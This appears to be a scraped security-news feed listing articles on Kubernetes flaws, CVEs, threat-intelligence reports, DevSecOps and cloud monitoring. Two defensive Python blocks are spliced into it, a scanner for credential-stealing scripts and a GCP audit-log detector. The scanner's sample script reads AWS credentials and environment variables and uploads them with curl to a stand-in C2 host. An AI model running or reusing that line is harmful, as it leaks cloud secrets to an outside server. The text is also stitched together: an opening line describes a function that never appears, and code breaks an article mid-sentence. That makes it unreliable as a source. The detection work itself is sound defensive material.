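Pointing `extract_domains` at a captured loader is a quick way to pull candidate C2 hostnames out without executing it; on a real sample expect to try both offsets, and treat anything that matches the hostname pattern as a lead to verify rather than an indicator on its own.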
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24768 www.secnews.physaphae.fr/article.php?IdArticle=4332510 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure CVE-2022-24730 2022-03-23T21:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24730 www.secnews.physaphae.fr/article.php?IdArticle=4331949 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure CVE-2022-24731 2022-03-23T21:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24731 www.secnews.physaphae.fr/article.php?IdArticle=4331950 False Tool,Vulnerability Uber None Anomali - Firm Blog Anomali Cyber Watch: Mobile Malware Is On The Rise, APT Groups Are Working Together, Ransomware For The Individual, and More Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence What’s With The Shared VBA Code Between Transparent Tribe And Other Threat Actors? (published: February 9, 2022) A recent discovery has been made that links malicious VBA macro code between multiple groups, namely: Transparent Tribe, Donot Team, SideCopy, Operation Hangover, and SideWinder. These groups operate (or operated) out of South Asia and use a variety of techniques with phishing emails and maldocs to target government and military entities within India and Pakistan. The code is similar enough that it suggests cooperation between APT groups, despite having completely different goals/targets. Analyst Comment: This research shows that APT groups are sharing TTPs to assist each other, regardless of motive or target. Files that request content be enabled to properly view the document are often signs of a phishing attack. If such a file is sent to you via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. 
Thus, any such file attachment sent by unknown senders should be viewed with the utmost scrutiny, and the attachments should be avoided and properly reported to appropriate personnel. MITRE ATT&CK: [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Phishing - T1566 Tags: Transparent Tribe, Donot, SideWinder, Asia, Military, Government Fake Windows 11 Upgrade Installers Infect You With RedLine Malware (published: February 9, 2022) Due to the recent announcement of Windows 11 upgrade availability, an unknown threat actor has registered a domain to trick users into downloading an installer that contains RedLine malware. The site, "windows-upgraded[.]com", is a direct copy of a legitimate Microsoft upgrade portal. Clicking the 'Upgrade Now' button downloads a 734MB ZIP file which contains an excess of dead code; more than likely this is to increase the filesize for bypassing any antivirus scan. RedLine is a well-known infostealer, capable of taking screenshots, using C2 communications, keylogging and more. Analyst Comment: Any official Windows update or installation files will be downloaded through the operating system directly. If offline updates are necessary, only go through Microsoft sites and subdomains. Never update Windows from a third-party site due to this type of attack. 
MITRE ATT&CK: [MITRE ATT&CK] Video Capture - T1125 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 Tags: RedLine, Windows 11, Infostealer 2022-02-15T20:01:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-mobile-malware-is-on-the-rise-apt-groups-are-working-together-ransomware-for-the-individual-and-more www.secnews.physaphae.fr/article.php?IdArticle=4134740 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline APT 43,Uber,APT 36,APT-C-17 None Security Affairs - Security Blog Argo CD flaw could allow stealing sensitive data from Kubernetes Apps 2022-02-06T13:49:13+00:00 https://securityaffairs.co/wordpress/127708/hacking/kubernetes-argo-cd-flaw.html?utm_source=rss&utm_medium=rss&utm_campaign=kubernetes-argo-cd-flaw www.secnews.physaphae.fr/article.php?IdArticle=4088680 False Tool Uber None The Hacker News - The Hacker News is a hacking news blog (surprising, right?) New Argo CD Bug Could Let Hackers Steal Secret Info from Kubernetes Apps 2022-02-05T21:48:25+00:00 https://thehackernews.com/2022/02/new-argo-cd-bug-could-let-hackers-steal.html www.secnews.physaphae.fr/article.php?IdArticle=4088212 False Tool,Vulnerability Uber None Anomali - Firm Blog Inside TeamTNT's Impressive Arsenal: A Look Into A TeamTNT Server Figure 1 - Overview of /cmd/ Contained on the server are approximately 50 scripts, most of which are already documented, located in the /cmd/ directory. The objectives of the scripts vary and include the following: AWS credential stealer, Diamorphine rootkit, IP scanners, Mountsploit, scripts to set up utilities, scripts to set up miners, and scripts to remove previous miners. Figure 2 - Snippet of AWS Credential Stealer Script One notable script is the one that steals AWS EC2 credentials, shown above in Figure 2. The AWS access key, secret key, and token are piped into a text file that is uploaded to the Command and Control (C2) server.
Figure 3 - Chimaera_Kubernetes_root_PayLoad_2.sh Another interesting script is shown in Figure 3 above, which checks the architecture of the system and retrieves the XMRig miner version for that architecture from another open TeamTNT server, 85.214.149[.]236. Binaries (/bin/) Figure 4 - Overview of /bin Within the /bin/ folder, shown in Figure 4 above, there is a collection of malicious binaries and utilities that TeamTNT uses in their operations. Among the files are well-known samples that are attributed to TeamTNT, including the Tsunami backdoor and an XMRig cryptominer. Some of the tools have their source code located on the server, such as TeamTNT Bot. The folder /a.t.b contains the source code for the TeamTNT bot, shown in Figures 5 and 6 below. In addition, the same binaries have been found on a TeamTNT Docker, noted in Appendix A. 2021-10-06T19:06:00+00:00 https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server www.secnews.physaphae.fr/article.php?IdArticle=3479896 False Malware,Tool,Threat APT 32,Uber None Anomali - Firm Blog Anomali Cyber Watch: Azurescape Cloud Threat, MSHTML 0-Day in The Wild, Confluence Cloud Hacked to Mine Monero, and More Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag. Trending Cyber News and Threat Intelligence S.O.V.A. – A New Android Banking Trojan with Fowl Intentions (published: September 10, 2021) ThreatFabric researchers have discovered a new Android banking trojan called S.O.V.A. The malware is still in the development and testing phase and the threat actor is publicly advertising S.O.V.A. for trial runs targeting banks to improve its functionality. The trojan’s primary objective is to steal personally identifiable information (PII).
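The AWS credential stealer in the TeamTNT write-up above reduces to a pattern a scanner can look for: read credential material (metadata service, ~/.aws/credentials, AWS_* variables), write it to a file, ship the file to a remote host. The heuristic below is an added example, not TeamTNT's script and not Anomali's tooling; the regex lists are this example's assumptions, the two scripts it scans are constructed, and the upload target is a reserved example hostname rather than the server named in the report.

```python
"""Heuristic for the credential-theft pattern described above.

Added example, not TeamTNT's script and not Anomali's tooling: a scanner that
reads shell scripts and reports the ones that both read AWS credential material
(instance metadata, ~/.aws/credentials, AWS_* environment variables) and push a
file or data to a remote host with curl, wget or netcat. The pattern lists are
this example's assumptions, and the two scripts are constructed (the upload
target is a reserved example hostname, not the server from the report).
"""
import re
from typing import Dict, List

# Where a script can read AWS credentials from, one regex per named source.
CREDENTIAL_SOURCES = {
    "imds": re.compile(r"169\.254\.169\.254|/latest/meta-data/iam/security-credentials"),
    "aws_cli_file": re.compile(r"\.aws/credentials"),
    "env_vars": re.compile(r"AWS_(?:ACCESS_KEY_ID|SECRET_ACCESS_KEY|SESSION_TOKEN)|grep\s+-i\s+AWS_"),
}
# Ways a script pushes data off the box: curl with a body/upload flag, wget
# POST, or a raw netcat connection to a port.
EXFIL_SINKS = {
    "curl_upload": re.compile(r"\bcurl\b[^\n]*(?:\s-[A-Za-z]*[FdT]\s|--data|--upload-file|--form)"),
    "wget_post": re.compile(r"\bwget\b[^\n]*--post-(?:file|data)"),
    "netcat": re.compile(r"\b(?:nc|ncat|netcat)\b[^\n]*\s\d{2,5}\b"),
}


def scan_script(name: str, text: str) -> Dict[str, object]:
    """Classify one script: credential-theft (read + exfil), credential-read, or clean."""
    sources = [label for label, rx in CREDENTIAL_SOURCES.items() if rx.search(text)]
    sinks = [label for label, rx in EXFIL_SINKS.items() if rx.search(text)]
    if sources and sinks:
        verdict = "credential-theft"
    elif sources:
        verdict = "credential-read"
    else:
        verdict = "clean"
    return {"script": name, "sources": sources, "sinks": sinks, "verdict": verdict}


def scan_all(scripts: Dict[str, str]) -> List[Dict[str, object]]:
    """Scan a name -> contents mapping and keep anything that is not clean."""
    hits = [scan_script(name, text) for name, text in scripts.items()]
    return [h for h in hits if h["verdict"] != "clean"]


# Constructed sample mirroring the described behaviour: credentials collected
# into a file, then the file uploaded. Not the real script.
STEALER_SH = """#!/bin/bash
OUT=/tmp/.x
env | grep -i AWS_ > $OUT
cat ~/.aws/credentials >> $OUT 2>/dev/null
curl -s -F "file=@$OUT" http://c2.example.invalid/in
"""

# Constructed benign script: touches the same credential file but sends nothing out.
DEPLOY_SH = """#!/bin/bash
REGION=$(aws configure get region)
test -r ~/.aws/credentials || exit 1
curl -s -o /tmp/health http://localhost:8080/healthz
"""

if __name__ == "__main__":
    for hit in scan_all({"stealer.sh": STEALER_SH, "deploy.sh": DEPLOY_SH}):
        print(hit)
```

The two-part verdict is deliberate: plenty of legitimate automation reads the credential file, so a source match alone is only worth a low-priority note, while source plus sink on the same script is what merits an alert. Feed it the contents of a dropped /cmd/-style directory and triage the credential-theft verdicts first.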
This is conducted through overlay attacks, keylogging, man-in-the-middle attacks, and session cookie theft, among others. The malware author is also working on other features such as distributed denial-of-service (DDoS) and ransomware on S.O.V.A.’s project roadmap. Analyst Comment: Always keep your mobile phone fully patched with the latest security updates. Only use official locations such as the Google Play Store / Apple App Store to obtain your software, and avoid downloading applications, even if they appear legitimate, from third-party stores. Furthermore, always review the permissions an app will request upon installation. MITRE ATT&CK: [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Man-in-the-Middle - T1557 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Network Denial of Service - T1498 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 Tags: Android, Banking trojan, S.O.V.A., Overlay, Keylogging, Cookies, Man-in-the-Middle Finding Azurescape – Cross-Account Container Takeover in Azure Container Instances (published: September 9, 2021) Unit 42 researchers identified and disclosed critical security issues in Microsoft’s Container-as-a-Service (CaaS) offering, Azure Container Instances (ACI). A malicious Azure user could have compromised the multitenant Kubernetes clusters hosting ACI, establishing full control over other users' containers. Researchers gave the vulnerability a specific name, Azurescape, highlighting its significance: it is the first cross-account container takeover in the public cloud. Analyst Comment: Azurescape vulnerabilities could have allowed an attacker to execute code on other users' containers, steal customer secrets and images deployed to the platform, and abuse ACI's infrastructure processing power.
Microsoft patched ACI shortly after the discl 2021-09-14T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-azurescape-cloud-threat-mshtml-0-day-in-the-wild-confluence-cloud-hacked-to-mine-monero-and-more www.secnews.physaphae.fr/article.php?IdArticle=3369753 False Ransomware,Spam,Malware,Tool,Vulnerability,Threat,Guideline Uber,APT 15,APT 41 None Anomali - Firm Blog Anomali Cyber Watch: APT31 Targeting French Home Routers, Multiple Microsoft Vulnerabilities, StrongPity Deploys Android Malware, and More Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Windows “PetitPotam” Network Attack – How to Protect Against It (published: July 21, 2021) Microsoft has released mitigations for a new Windows vulnerability called PetitPotam. Security researcher Gilles Lionel created a proof-of-concept script that abuses Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC) to coerce a target into authenticating with NT LAN Manager (NTLM). PetitPotam can only be exploited when the following conditions are met: NTLM authentication is enabled on the domain, Active Directory Certificate Services (AD CS) is in use, and Certificate Authority Web Enrollment or Certificate Enrollment Web Service is enabled. Exploitation results in an NTLM relay attack, which is a type of man-in-the-middle attack. Analyst Comment: Microsoft has provided mitigation steps for this attack, which include disabling NTLM on potentially affected domains, among others. Tags: Vulnerability, Microsoft, PetitPotam, Man-in-the-middle APT31 Modus Operandi Attack Campaign Targeting France (published: July 21, 2021) The French cybersecurity watchdog, ANSSI, issued an alert via the French computer emergency response team (CERT) discussing attacks targeting multiple French entities.
The China-sponsored, advanced persistent threat (APT) group APT31 (Judgment Panda, Zirconium) has been attributed to this ongoing activity. The group was observed using “a network of compromised home routers as operational relay boxes in order to perform stealth reconnaissance as well as attacks.” Analyst Comment: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. MITRE ATT&CK: [MITRE ATT&CK] Resource Hijacking - T1496 Tags: APT, APT31, Judgment Panda, Zirconium, Home routers StrongPity APT Group Deploys Android Malware for the First Time (published: July 21, 2021) Trend Micro researchers conducted analysis on a malicious APK sample shared on Twitter by MalwareHunterTeam. The shared sample was discussed as being a trojanized version of an Android app offered on the authentic Syrian E-Gov website, potentially via a watering-hole attack. Researchers took this information and pivoted further to analyze the backdoor functionality of the trojanized app (which is no longer being distributed on the official Syrian E-Gov website). 
Additional samples were identified to be contacting URLs that are identical to or following previous r 2021-07-27T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apt31-targeting-french-home-routers-multiple-microsoft-vulnerabilities-strongpity-deploys-android-malware-and-more www.secnews.physaphae.fr/article.php?IdArticle=3140285 False Malware,Tool,Vulnerability,Threat APT 31,Uber None CVE Liste - Common Vulnerability Exposure CVE-2021-32690 2021-06-16T22:15:07+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-32690 www.secnews.physaphae.fr/article.php?IdArticle=2940684 False Tool,Vulnerability Uber None Veracode - Application Security Research, News, and Education Blog DevSecOps in Practice: How to Embed Security into the DevOps Lifecycle You've heard of DevOps. And by now, you've probably also heard of DevSecOps, which extends DevOps principles into the realm of security. In DevSecOps, security breaks out of its "silo" and becomes a core part of the DevOps lifecycle. That, at least, is the theory behind DevSecOps. What's often more challenging for developers to figure out is how to apply DevSecOps in practice. Which tools and processes actually operationalize DevSecOps? Until you can answer that question, DevSecOps will be just another buzzword. To help bridge the gap between theory and practice, let's walk through what DevSecOps means from a practical perspective, and how to go about embedding it into your development workflows. DevSecOps, defined If you're familiar with DevOps (which encourages collaboration between developers and IT operations engineers in order to speed application delivery), then the meaning of DevSecOps is easy enough to understand. DevSecOps adds security operations teams into the equation so that they can collaborate seamlessly with developers and IT engineers. DevSecOps places a DevOps spin on basic security concepts.
Just as DevOps encourages continuous delivery, DevSecOps is all about continuous security, meaning the constant and holistic management of security across the software development lifecycle. Similarly, DevSecOps encourages continuous improvement in the realm of security, meaning that no matter how secure you believe your environment is, you should always be looking for ways to improve your security posture even further. DevSecOps in practice These are all great ideas to talk about, and it's easy to see why they are valuable. Security postures are indeed stronger when developers, IT engineers, and security engineers work together, rather than working in isolation. It's much easier to optimize security when developers prioritize security with every line of code they write, and when IT engineers think about the security implications of every deployment they push out, rather than viewing security as something that someone else will handle down the line. The big question for teams that want to embrace DevSecOps, though, is how to go about putting these ideas into practice. That's where things can get tougher. There is no simple methodology that allows you to "do" DevSecOps. Nor is there a specific tool that you can deploy or a particular role that you can add to your team. Instead, operationalizing DevSecOps means building holistic combinations of processes and tools that make it possible to integrate security into DevOps workflows. While the best approach to this will vary from team to team, the following are some general best practices for implementing DevSecOps. Scanning early and often One basic step toward implementing DevSecOps is to ensure that you perform security tests and audits at the beginning of the software delivery pipeline. You don't want to wait until code is written and built to start testing it for flaws (and you certainly don't want to let it get into production before testing it).
Instead, you should be scanning code as it is written, by integrating security tooling directly into your IDEs if possible. Importantly, security scanning should continue as code "flows" down the pipeline. You should scan your test builds and application release candidates before deployment. Security monitoring and auditing should also continue once code is in production. Automation Automation is a founding principle of DevOps, and it's just as important to DevSecOps. Automation not only makes processes faster and more efficient, but also helps reduce friction between the different stakeholders in DevSecOps 2021-04-19T09:05:28+00:00 https://www.veracode.com/blog/secure-development/devsecops-practice-how-embed-security-devops-lifecycle www.secnews.physaphae.fr/article.php?IdArticle=2665989 False Tool Uber 3.0000000000000000 TechRepublic - Security News US How to quickly validate your Kubernetes configuration files 2021-03-03T17:51:31+00:00 https://www.techrepublic.com/article/how-to-quickly-validate-your-kubernetes-configuration-files/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=2429088 False Tool Uber None CVE Liste - Common Vulnerability Exposure CVE-2021-21303 2021-02-05T22:15:12+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21303 www.secnews.physaphae.fr/article.php?IdArticle=2302251 False Tool Uber None Darknet - The Darkside - American news site GKE Auditor – Detect Google Kubernetes Engine Misconfigurations GKE Auditor is a Java-based tool to detect Google Kubernetes Engine misconfigurations; it aims to help security and development teams streamline the configuration process and save time looking for generic bugs and vulnerabilities. The tool consists of individual modules called Detectors, each scanning for a specific vulnerability.
Installing and Using GKE Auditor to Detect Google Kubernetes Engine Misconfigurations Installation git clone https://github.com/google/gke-auditor cd ./gke-auditor/ ./build.sh Usage The tool has to be built by running the build.sh script first. 2021-01-01T10:59:21+00:00 https://www.darknet.org.uk/2021/01/gke-auditor-detect-google-kubernetes-engine-misconfigurations/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed www.secnews.physaphae.fr/article.php?IdArticle=2139015 False Tool Uber None Veracode - Application Security Research, News, and Education Blog A Software Security Checklist Based on the Most Effective AppSec Programs Veracode's Chris Wysopal and Chris Eng joined Enterprise Strategy Group (ESG) Senior Analyst Dave Gruber and award-winning security writer and host of the Smashing Security podcast, Graham Cluley, at Black Hat USA to unveil the findings from a new ESG research report, Modern Application Development Security. The research is based on a survey of nearly 400 developers and security professionals, which explored the dynamic between the roles, their trigger points, the extent to which security teams understand modern development, and the buying intentions of application security (AppSec) teams. As the presenters went through the data, it led to a larger discussion about AppSec best practices and what steps organizations can take to mature their programs. Here are the best practices laid out during the presentation as an easy-to-follow checklist as well as supporting data from the ESG report. Application security controls are highly integrated into the CI/CD toolchain.
In the ESG survey, 43 percent of organizations agreed that DevOps integration is most important to improving AppSec programs, but only 56 percent of respondents answered that they use a highly integrated set of security controls throughout their DevOps process. Integrating security measures into the CI/CD toolchain not only makes it easier for developers to run AppSec tests, but it also helps organizations discover security issues sooner, which speeds up time to deployment. Application security best practices are formally documented. In order to have a successful AppSec program, everyone needs to be on the same page regarding best practices. The CISO should help facilitate the formal documentation of AppSec best practices. Developers and security professionals can reference the list and use it to guide their decisions. Application security training is included as part of the ongoing development security training program. Developers have been increasingly tasked with implementing security measures, including writing secure code and remediating vulnerabilities. Most developers don't receive secure code training courses in college, so it is up to organizations to offer security training. But according to the survey, more than 20 percent of organizations only provide training when developers join the team. Developers should have multiple, at-leisure training opportunities throughout the year, like virtual or hands-on programs, such as Veracode Security Labs. Chris Wysopal pointed out the importance of human touchpoints as part of ongoing developer training. If someone is checking in on developers to make sure they're completing their training, they'll likely take it more seriously. Consider a security champions program. The security champions are developers who have an interest in learning about security.
If you have at least one security champion on every scrum team, that person can help ensure that their peers are up to speed on the latest security training and best practices. Ongoing developer security training includes formal training programs, and a high percentage of developers participate. At-leisure security training is a great way for developers to learn on their own time. But it is also important to implement formal security training with a set completion date and a skills assessment. Without formal security training, developers may not develop the skills they need to write secure code and remediate vulnerabilities. This could lead to slower and more expensive deployments because of rework or vulnerable code being pushed to production. Accordin 2020-10-29T13:04:48+00:00 https://www.veracode.com/blog/intro-appsec/software-security-checklist-based-most-effective-appsec-programs www.secnews.physaphae.fr/article.php?IdArticle=2103305 False Tool,Vulnerability,Guideline Uber None TechRepublic - Security News US How to create a Kubernetes ReplicaSet 2020-07-15T14:17:38+00:00 https://www.techrepublic.com/article/how-to-create-a-kubernetes-replicaset/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1805910 False Tool Uber None Security Affairs - Security Blog Microsoft discovers cryptomining campaign targeting Kubeflow tool for Kubernetes clusters 2020-06-11T18:09:02+00:00 https://securityaffairs.co/wordpress/104618/cyber-crime/cryptomining-campaign-targets-kubernetes-kubeflow.html?utm_source=rss&utm_medium=rss&utm_campaign=cryptomining-campaign-targets-kubernetes-kubeflow www.secnews.physaphae.fr/article.php?IdArticle=1762407 False Tool Uber None TechRepublic - Security News US How to use port forwarding with containers deployed in a Kubernetes cluster 2020-04-10T14:47:27+00:00 https://www.techrepublic.com/article/how-to-use-port-forwarding-with-containers-deployed-in-a-kubernetes-cluster/#ftag=RSS56d97e7
www.secnews.physaphae.fr/article.php?IdArticle=1646793 False Tool Uber None AlienVault Blog - AlienVault is a major defense player in IOCs Google Cloud Platform security monitoring with USM Anywhere™ 2019 Cyber Security Report published by the International Information System Security Certification Consortium, 93 percent of organizations say they are concerned about cloud security and 28 percent admit to having experienced cloud security incidents during the past year. The reality is, most companies lack the specialized knowledge and skills needed to ensure that customer data stored in the cloud is protected. Cloud service providers (CSPs) do provide extra security layers, such as automating threat detection, with the intent of making their customers feel more confident in the security of the cloud. However, the number of cloud breaches that are being reported shows that CSPs and organizations alike continue to struggle with cloud security. Much of this is due to a lack of unified visibility not just in the cloud, but across an organization’s entire network, siloed teams and technologies, lack of threat intelligence, and partnerships with third parties whose security controls are not up to snuff. To address these challenges, many in the industry are advocating for organizations to simplify and unify their security approach, i.e. bring as many controls as possible into a single solution in order to break down the silos between security teams and technologies and to give greater visibility across the organization. We at AT&T Cybersecurity help organizations to accomplish this with our Unified Security Management™ (USM) Anywhere platform. Of course, the effectiveness of any security solution is largely determined by the threat intelligence underpinning it. In any environment, we need to identify the common tactics, techniques, and procedures (TTPs) adversaries are using in their attacks.
Below, we provide an overview of the latest threat intelligence from Alien Labs™ for Google Cloud Platform (GCP), which helps security practitioners to discover issues in their cloud workloads and detect adversaries exploiting attack vectors commonly seen in cloud environments. Google Cloud Platform integration in USM This summer, AT&T Cybersecurity launched the USM Anywhere™ integration with GCP. Through the USM Anywhere Alien App for GCP, USM can now consume all logging information managed by the Stackdriver utility in a configurable and intuitive way. Google Cloud Platform logs are provided through three major channels: Audit Logs. Record all events impacting objects within the environment. These logs are used to monitor any cloud assets, presenting a solid baseline for security detection. VPC Flow Logs. Halfway between resource monitoring and cloud infrastructure security, these logs are the delight of NIDS enthusiasts. Firewall Logs. These help with auditing firewall rule events, and they are useful in detecting risky open ports and other configuration issues. In USM, these channels are processed by different plugins, which extract pieces of intelligence and map them to variables that are easy to steer into orchestration rules. The correlation engine allows for the combination of detections from different channels into a single orchestration rule, scaling GCP security to a new level. To prevent an intrusion from being recorded or triggering a notification, adversaries may try to disable audit logging once they get the necessary permissions. To protect against that, the product has out-of-the-box correlation rules to generate an alert if any of the logging features is disabled.
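The "alert if a logging feature is disabled" rule described above, written out against Cloud Audit Log entries, as an added example that is not USM Anywhere's correlation logic. The Logging API method names for sinks and exclusions are the real ones; the checks it applies to Compute request bodies for VPC flow log and firewall log changes are this example's assumptions, and the log entries, principals and resource names are constructed.

```python
"""Alert when someone turns GCP logging off, from Cloud Audit Log entries.

Added example, not USM Anywhere's correlation rules: it implements the rule the
text describes (raise an alert if a logging feature is disabled) over Admin
Activity audit log entries in their JSON form. The entries are constructed, with
placeholder principal, project and resource names. The Logging API method names
for sinks and exclusions are real; the checks on Compute request bodies for
flow-log and firewall-log changes are this example's assumptions.
"""
import json
from typing import Dict, List, Optional

# Logging configuration changes that reduce what gets recorded.
LOGGING_CONFIG_METHODS = {
    "google.logging.v2.ConfigServiceV2.DeleteSink": "high",
    "google.logging.v2.ConfigServiceV2.UpdateSink": "medium",
    "google.logging.v2.ConfigServiceV2.CreateExclusion": "high",
    "google.logging.v2.ConfigServiceV2.UpdateExclusion": "medium",
}


def _logging_disabled_in(request: Dict) -> bool:
    """True if a Compute patch/update body switches flow or firewall logging off."""
    log_config = request.get("logConfig") or {}
    return log_config.get("enable") is False or request.get("enableFlowLogs") is False


def evaluate(entry: Dict) -> Optional[Dict]:
    """Return an alert dict for one audit log entry, or None if it is uninteresting."""
    payload = entry.get("protoPayload") or {}
    method = payload.get("methodName", "")
    request = payload.get("request") or {}
    alert: Optional[Dict] = None
    if method in LOGGING_CONFIG_METHODS:
        alert = {"rule": "logging-config-changed", "severity": LOGGING_CONFIG_METHODS[method]}
    elif ".compute.subnetworks." in method and _logging_disabled_in(request):
        alert = {"rule": "vpc-flow-logs-disabled", "severity": "high"}
    elif ".compute.firewalls." in method and _logging_disabled_in(request):
        alert = {"rule": "firewall-logging-disabled", "severity": "high"}
    if alert is None:
        return None
    alert.update({
        "actor": (payload.get("authenticationInfo") or {}).get("principalEmail", "unknown"),
        "method": method,
        "resource": payload.get("resourceName", ""),
        "time": entry.get("timestamp"),
    })
    return alert


def detect(raw_lines: List[str]) -> List[Dict]:
    """Run evaluate() over newline-delimited JSON log entries, skipping unparsable lines."""
    alerts = []
    for line in raw_lines:
        line = line.strip()
        if not line:
            continue
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue
        alert = evaluate(entry)
        if alert:
            alerts.append(alert)
    return alerts


def _entry(method: str, actor: str, resource: str, ts: str, request: Optional[Dict] = None) -> str:
    """Build one constructed audit log line in the Cloud Audit Log JSON shape."""
    payload = {"methodName": method, "authenticationInfo": {"principalEmail": actor},
               "resourceName": resource}
    if request is not None:
        payload["request"] = request
    return json.dumps({"timestamp": ts, "severity": "NOTICE",
                       "logName": "projects/example-project/logs/cloudaudit.googleapis.com%2Factivity",
                       "protoPayload": payload})


# Constructed sample: a sink deletion, a subnet patch that turns flow logs off, an
# instance creation (benign), a sink update, a firewall patch that keeps logging on.
SAMPLE_LOG_LINES = [
    _entry("google.logging.v2.ConfigServiceV2.DeleteSink", "intruder@example.invalid",
           "projects/example-project/sinks/all-logs-to-siem", "2019-12-01T10:00:00Z"),
    _entry("v1.compute.subnetworks.patch", "intruder@example.invalid",
           "projects/example-project/regions/us-central1/subnetworks/default",
           "2019-12-01T10:01:00Z", {"logConfig": {"enable": False}}),
    _entry("v1.compute.instances.insert", "deployer@example.invalid",
           "projects/example-project/zones/us-central1-a/instances/web-1", "2019-12-01T10:02:00Z"),
    _entry("google.logging.v2.ConfigServiceV2.UpdateSink", "intruder@example.invalid",
           "projects/example-project/sinks/all-logs-to-siem", "2019-12-01T10:03:00Z"),
    _entry("v1.compute.firewalls.patch", "netops@example.invalid",
           "projects/example-project/global/firewalls/allow-ssh",
           "2019-12-01T10:04:00Z", {"logConfig": {"enable": True}}),
    "not json at all",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG_LINES):
        print(alert["severity"].upper(), alert["rule"], alert["actor"], alert["resource"])
```

The sink rules need a copy of the audit log that the attacker cannot also delete, which is why the export sink to a SIEM (the `all-logs-to-siem` resource in the sample) is usually the first thing they go after; routing the alert through a channel outside the project being watched keeps the detection alive after the sink is gone.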
2019-12-11T14:00:00+00:00 https://feeds.feedblitz.com/~/612840892/0/alienvault-blogs~Google-Cloud-Platform-security-monitoring-with-USM-Anywhere%e2%84%a2 www.secnews.physaphae.fr/article.php?IdArticle=1493780 False Tool,Threat,Guideline Uber None TechRepublic - Security News US How to deploy the Kubernetes WebUI with MicroK8s 2019-09-26T21:03:08+00:00 https://www.techrepublic.com/article/how-to-deploy-the-kubernetes-webui-with-microk8s/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1363845 False Tool Uber None ZD Net - Magazine Info Kubernetes CLI tool security flaw lets attackers run code on host machine 2019-06-26T20:51:02+00:00 https://www.zdnet.com/article/kubernetes-cli-tool-security-flaw-lets-attackers-run-code-on-host-machine/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=1175495 False Tool,Guideline Uber None IT Security Guru - Security Blog Gigamon Launches New Tool To Shine Light On Digital Apps Within the Enterprise. 2019-05-21T14:40:05+00:00 https://www.itsecurityguru.org/2019/05/21/gigamon-launches-new-tool-to-shine-light-on-digital-apps-within-the-enterprise/ www.secnews.physaphae.fr/article.php?IdArticle=1118107 False Tool Uber None CSO - CSO Daily Dashboard The most interesting and important hacks of 2018 2018-12-27T03:00:00+00:00 https://www.csoonline.com/article/3329860/hacking/the-most-interesting-and-important-hacks-of-2018.html#tk.rss_all www.secnews.physaphae.fr/article.php?IdArticle=966793 False Hack,Tool Uber None Wired Threat Level - Security News Algorithms Can Be a Tool For Justice-If Used the Right Way 2018-10-25T17:23:01+00:00 https://www.wired.com/story/algorithms-netflix-tool-for-justice www.secnews.physaphae.fr/article.php?IdArticle=862865 False Tool Uber None Wired Threat Level - Security News An App Built for Hurricane Harvey Is Now Saving Lives in Florida 2018-10-18T19:03:05+00:00 https://www.wired.com/story/an-app-built-for-hurricane-harvey-is-now-saving-lives-in-florida
www.secnews.physaphae.fr/article.php?IdArticle=853941 False Tool,Guideline Uber None